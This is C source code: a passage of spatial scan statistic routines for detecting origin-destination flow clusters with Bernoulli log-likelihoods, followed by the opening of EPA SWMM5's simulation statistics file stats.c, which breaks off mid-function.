int totalCenters = nRow * nRow * nCol * nCol;
#pragma omp parallel for private(distanceO, distanceD, minWindow)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]));
distanceD = sqrt((centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
if(distanceO > distanceD) {
minWindow = (int)(ceil(distanceO / wSize));
}
else {
minWindow = (int)(ceil(distanceD / wSize));
}
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2)) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
}
void getCCCount2DDiff(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindowO, minWindowD;
int windowPerCen = wCount * wCount;
int totalWindows = windowPerCen * locCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindowO, minWindowD)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]));
distanceD = sqrt((x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
minWindowO = (int)(ceil(distanceO / wSize));
minWindowD = (int)(ceil(distanceD / wSize));
if(minWindowO > 0)
minWindowO --;
if(minWindowD > 0)
minWindowD --;
for(int k = minWindowO; k < wCount; k++) {
for(int l = minWindowD; l < wCount; l++) {
casInW[i * windowPerCen + k * wCount + l] += nCass[j];
conInW[i * windowPerCen + k * wCount + l] += nCons[j];
}
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i]));
int sumWindow = (int)(ceil(ODDistance / wSize)) - 2;
for(int k = 0; k < wCount; k++) {
for(int l = 0; l < wCount; l++) {
if(k + l > sumWindow) {
casInW[i * windowPerCen + k * wCount + l] = -1;
}
}
}
}
}
return;
}
void getCCCount2DDiff(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindowO, minWindowD;
int windowPerCen = wCount * wCount;
int totalCenters = nRow * nRow * nCol * nCol;
int totalWindows = totalCenters * windowPerCen;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindowO, minWindowD)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]));
distanceD = sqrt((centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
minWindowO = (int)(ceil(distanceO / wSize));
minWindowD = (int)(ceil(distanceD / wSize));
if(minWindowO > 0)
minWindowO --;
if(minWindowD > 0)
minWindowD --;
for(int k = minWindowO; k < wCount; k++) {
for(int l = minWindowD; l < wCount; l++) {
casInW[i * windowPerCen + k * wCount + l] += nCass[j];
conInW[i * windowPerCen + k * wCount + l] += nCons[j];
}
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2));
int sumWindow = (int)(ceil(ODDistance / wSize)) - 2;
for(int k = 0; k < wCount; k++) {
for(int l = 0; l < wCount; l++) {
if(k + l > sumWindow) {
casInW[i * windowPerCen + k * wCount + l] = -1;
}
}
}
}
}
}
void loglikelihood(double * ll, int * casInW, int * conInW, int totalWindow, int casCount, int conCount, int highLow) {
double cas, con, tot;
double llTemp;
int totCount = casCount + conCount;
bool highCluster = true;
bool lowCluster = true;
if(highLow == 1)
lowCluster = false;
else if(highLow == -1)
highCluster = false;
#pragma omp parallel for private(cas, con, tot, llTemp)
for(int i = 0; i < totalWindow; i++) {
cas = casInW[i];
con = conInW[i];
tot = cas + con;
if(cas == -1) {
ll[i] = 1;
}
else if(cas * conCount > con * casCount) { //High cluster of cases
if(highCluster) {
llTemp = cas * log(cas/tot);
if(con > 0)
llTemp += con * log(con/tot);
if(casCount > cas)
llTemp += (casCount - cas) * log((casCount - cas)/(totCount - tot));
if(conCount > con)
llTemp += (conCount - con) * log((conCount - con)/(totCount - tot));
ll[i] = llTemp;
}
else
ll[i] = 1;
}
else { //Low cluster of cases
if(lowCluster) {
llTemp = con * log(con/tot);
if(cas > 0)
llTemp += cas * log(cas/tot);
if(casCount > cas)
llTemp += (casCount - cas) * log((casCount - cas)/(totCount - tot));
if(conCount > con)
llTemp += (conCount - con) * log((conCount - con)/(totCount - tot));
ll[i] = llTemp;
}
else
ll[i] = 1;
}
}
}
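/*
 * Model note (added for clarity): the branches above compute the log of the
 * alternative-hypothesis likelihood of a Bernoulli spatial scan statistic
 * (as in Kulldorff's scan test), with cas cases out of tot points inside the
 * window and casCount, totCount the study-wide totals. The constant
 * null-model term is omitted, so every valid window has ll <= 0; the value 1
 * is therefore a safe sentinel for excluded or wrong-sided windows.
 */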
void findTopNCluster4DSph(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
double lastX1, lastY1, lastX2, lastY2, lastRad;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
double distance;
int maxWindow;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distance = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1) + (x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRad;
maxWindow = ceil(distance / wSize) - 1;
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secondary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster4DSph(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRad = (aRadius + 1) * wSize;
double distance;
int maxWindow;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distance = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1) + (thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRad;
maxWindow = ceil(distance / wSize) - 1;
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secondary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DSame(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
double lastX1, lastY1, lastX2, lastY2, lastRad;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
double distanceO, distanceD;
int maxWindow;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distanceO = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1)) - lastRad;
distanceD = sqrt((x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRad;
if(distanceO > distanceD) {
maxWindow = ceil(distanceO / wSize) - 1;
}
else {
maxWindow = ceil(distanceD / wSize) - 1;
}
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secondary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DSame(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRad = (aRadius + 1) * wSize;
double distanceO, distanceD;
int maxWindow;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distanceO = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1)) - lastRad;
distanceD = sqrt((thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRad;
if(distanceO > distanceD) {
maxWindow = ceil(distanceO / wSize) - 1;
}
else {
maxWindow = ceil(distanceD / wSize) - 1;
}
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secondary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DDiff(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radiusO, int * radiusD, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadiusO = -1;
int aRadiusD = -1;
int windowPerCen = wCount * wCount;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[0] = aCenter;
radiusO[0] = aRadiusO;
radiusD[0] = aRadiusD;
cLL[0] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
double lastX1, lastY1, lastX2, lastY2, lastRadO, lastRadD;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
double distanceO, distanceD;
int maxWindowO, maxWindowD;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distanceO = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1)) - lastRadO;
distanceD = sqrt((x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRadD;
maxWindowO = ceil(distanceO / wSize) - 1;
maxWindowD = ceil(distanceD / wSize) - 1;
if(maxWindowO < 0)
maxWindowO = 0;
if(maxWindowD < 0)
maxWindowD = 0;
for(int j = maxWindowO; j < wCount; j++) {
for(int k = maxWindowD; k < wCount; k++) {
ll[i * windowPerCen + j * wCount + k] = 1;
}
}
}
//Find secondary clusters
aCenter = -1;
aRadiusO = -1;
aRadiusD = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[c] = aCenter;
radiusO[c] = aRadiusO;
radiusD[c] = aRadiusD;
if(aCenter != -1) {
cLL[c] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
}
return;
}
void findTopNCluster2DDiff(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radiusO, int * radiusD, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int windowPerCen = wCount * wCount;
int aCenter = -1;
int aRadiusO = -1;
int aRadiusD = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[0] = aCenter;
radiusO[0] = aRadiusO;
radiusD[0] = aRadiusD;
cLL[0] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRadO = (aRadiusO + 1) * wSize;
double lastRadD = (aRadiusD + 1) * wSize;
double distanceO, distanceD;
int maxWindowO, maxWindowD;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distanceO = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1)) - lastRadO;
distanceD = sqrt((thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRadD;
maxWindowO = ceil(distanceO / wSize) - 1;
maxWindowD = ceil(distanceD / wSize) - 1;
if(maxWindowO < 0)
maxWindowO = 0;
if(maxWindowD < 0)
maxWindowD = 0;
for(int j = maxWindowO; j < wCount; j++) {
for(int k = maxWindowD; k < wCount; k++) {
ll[i * windowPerCen + j * wCount + k] = 1;
}
}
}
//Find secondary clusters
aCenter = -1;
aRadiusO = -1;
aRadiusD = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[c] = aCenter;
radiusO[c] = aRadiusO;
radiusD[c] = aRadiusD;
if(aCenter != -1) {
cLL[c] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
}
return;
}
|
stats.c | //-----------------------------------------------------------------------------
// stats.c
//
// Project: EPA SWMM5
// Version: 5.1
// Date: 03/20/14 (Build 5.1.001)
// 09/15/14 (Build 5.1.007)
// 03/19/15 (Build 5.1.008)
// 08/01/16 (Build 5.1.011)
// 03/14/17 (Build 5.1.012)
// Author: L. Rossman (EPA)
// R. Dickinson (CDM)
//
// Simulation statistics functions.
//
// Build 5.1.007:
// - Exfiltration losses added to storage node statistics.
//
// Build 5.1.008:
// - Support for updating groundwater statistics added.
// - Support for updating maximum reported nodal depths added.
// - OpenMP parallelization applied to updating node and link flow statistics.
// - Updating of time that conduit is upstrm/dnstrm full was modified.
//
// Build 5.1.011:
// - Surcharging is now evaluated only under dynamic wave flow routing and
// storage nodes cannot be classified as surcharged.
//
// Build 5.1.012:
// - Time step statistics now evaluated only in non-steady state periods.
// - Check for full conduit flow now accounts for number of barrels.
//
//-----------------------------------------------------------------------------
#define _CRT_SECURE_NO_DEPRECATE
#include <stdlib.h>
#include <string.h>
#include <math.h>
#if defined(_OPENMP)
#include <omp.h> //(5.1.008)
#endif
#include "headers.h"
#include "swmm5.h"
//-----------------------------------------------------------------------------
// Shared variables
//-----------------------------------------------------------------------------
#define MAX_STATS 5
static TSysStats SysStats;
static TMaxStats MaxMassBalErrs[MAX_STATS];
static TMaxStats MaxCourantCrit[MAX_STATS];
static TMaxStats MaxFlowTurns[MAX_STATS];
static double SysOutfallFlow;
//-----------------------------------------------------------------------------
// Exportable variables (shared with statsrpt.c)
//-----------------------------------------------------------------------------
TSubcatchStats* SubcatchStats;
TNodeStats* NodeStats;
TLinkStats* LinkStats;
TStorageStats* StorageStats;
TOutfallStats* OutfallStats;
TPumpStats* PumpStats;
double MaxOutfallFlow;
double MaxRunoffFlow;
//-----------------------------------------------------------------------------
// Imported variables
//-----------------------------------------------------------------------------
extern double* NodeInflow; // defined in massbal.c
extern double* NodeOutflow; // defined in massbal.c
//-----------------------------------------------------------------------------
// External functions (declared in funcs.h)
//-----------------------------------------------------------------------------
// stats_open (called from swmm_start in swmm5.c)
// stats_close (called from swmm_end in swmm5.c)
// stats_report (called from swmm_end in swmm5.c)
// stats_updateSubcatchStats (called from subcatch_getRunoff)
// stats_updateGwaterStats (called from gwater_getGroundwater) //(5.1.008)
// stats_updateFlowStats (called from routing_execute)
// stats_updateCriticalTimeCount (called from getVariableStep in dynwave.c)
// stats_updateMaxNodeDepth (called from output_saveNodeResults) //(5.1.008)
//-----------------------------------------------------------------------------
// Local functions
//-----------------------------------------------------------------------------
static void stats_updateNodeStats(int node, double tStep, DateTime aDate);
static void stats_updateLinkStats(int link, double tStep, DateTime aDate);
static void stats_findMaxStats(void);
static void stats_updateMaxStats(TMaxStats maxStats[], int i, int j, double x);
//=============================================================================
int stats_open()
//
// Input: none
// Output: returns an error code
// Purpose: opens the simulation statistics system.
//
{
int j, k;
// --- set all pointers to NULL
NodeStats = NULL;
LinkStats = NULL;
StorageStats = NULL;
OutfallStats = NULL;
PumpStats = NULL;
// --- allocate memory for & initialize subcatchment statistics
SubcatchStats = NULL;
if ( Nobjects[SUBCATCH] > 0 )
{
SubcatchStats = (TSubcatchStats *) calloc(Nobjects[SUBCATCH],
sizeof(TSubcatchStats));
if ( !SubcatchStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
for (j=0; j<Nobjects[SUBCATCH]; j++)
{
SubcatchStats[j].precip = 0.0;
SubcatchStats[j].runon = 0.0;
SubcatchStats[j].evap = 0.0;
SubcatchStats[j].infil = 0.0;
SubcatchStats[j].runoff = 0.0;
SubcatchStats[j].maxFlow = 0.0;
}
//// Added to release 5.1.008. //// //(5.1.008)
////
for (j=0; j<Nobjects[SUBCATCH]; j++)
{
if ( Subcatch[j].groundwater == NULL ) continue;
Subcatch[j].groundwater->stats.avgUpperMoist = 0.0;
Subcatch[j].groundwater->stats.avgWaterTable = 0.0;
Subcatch[j].groundwater->stats.infil = 0.0;
Subcatch[j].groundwater->stats.latFlow = 0.0;
Subcatch[j].groundwater->stats.deepFlow = 0.0;
Subcatch[j].groundwater->stats.evap = 0.0;
Subcatch[j].groundwater->stats.maxFlow = 0.0;
}
////
}
// --- allocate memory for node & link stats
if ( Nobjects[LINK] > 0 )
{
NodeStats = (TNodeStats *) calloc(Nobjects[NODE], sizeof(TNodeStats));
LinkStats = (TLinkStats *) calloc(Nobjects[LINK], sizeof(TLinkStats));
if ( !NodeStats || !LinkStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
}
// --- initialize node stats
if ( NodeStats ) for ( j = 0; j < Nobjects[NODE]; j++ )
{
NodeStats[j].avgDepth = 0.0;
NodeStats[j].maxDepth = 0.0;
NodeStats[j].maxDepthDate = StartDateTime;
NodeStats[j].maxRptDepth = 0.0; //(5.1.008)
NodeStats[j].volFlooded = 0.0;
NodeStats[j].timeFlooded = 0.0;
NodeStats[j].timeSurcharged = 0.0;
NodeStats[j].timeCourantCritical = 0.0;
NodeStats[j].totLatFlow = 0.0;
NodeStats[j].maxLatFlow = 0.0;
NodeStats[j].maxInflow = 0.0;
NodeStats[j].maxOverflow = 0.0;
NodeStats[j].maxPondedVol = 0.0;
NodeStats[j].maxInflowDate = StartDateTime;
NodeStats[j].maxOverflowDate = StartDateTime;
}
// --- initialize link stats
if ( LinkStats ) for ( j = 0; j < Nobjects[LINK]; j++ )
{
LinkStats[j].maxFlow = 0.0;
LinkStats[j].maxVeloc = 0.0;
LinkStats[j].maxDepth = 0.0;
LinkStats[j].timeSurcharged = 0.0;
LinkStats[j].timeFullUpstream = 0.0;
LinkStats[j].timeFullDnstream = 0.0;
LinkStats[j].timeFullFlow = 0.0;
LinkStats[j].timeCapacityLimited = 0.0;
LinkStats[j].timeCourantCritical = 0.0;
for (k=0; k<MAX_FLOW_CLASSES; k++)
LinkStats[j].timeInFlowClass[k] = 0.0;
LinkStats[j].flowTurns = 0;
LinkStats[j].flowTurnSign = 0;
}
// --- allocate memory for & initialize storage unit statistics
if ( Nnodes[STORAGE] > 0 )
{
StorageStats = (TStorageStats *) calloc(Nnodes[STORAGE],
sizeof(TStorageStats));
if ( !StorageStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( k = 0; k < Nobjects[NODE]; k++ )
{
if ( Node[k].type != STORAGE ) continue;
j = Node[k].subIndex;
StorageStats[j].initVol = Node[k].newVolume;
StorageStats[j].avgVol = 0.0;
StorageStats[j].maxVol = 0.0;
StorageStats[j].maxFlow = 0.0;
StorageStats[j].evapLosses = 0.0;
StorageStats[j].exfilLosses = 0.0; //(5.1.007)
StorageStats[j].maxVolDate = StartDateTime;
}
}
// --- allocate memory for & initialize outfall statistics
if ( Nnodes[OUTFALL] > 0 )
{
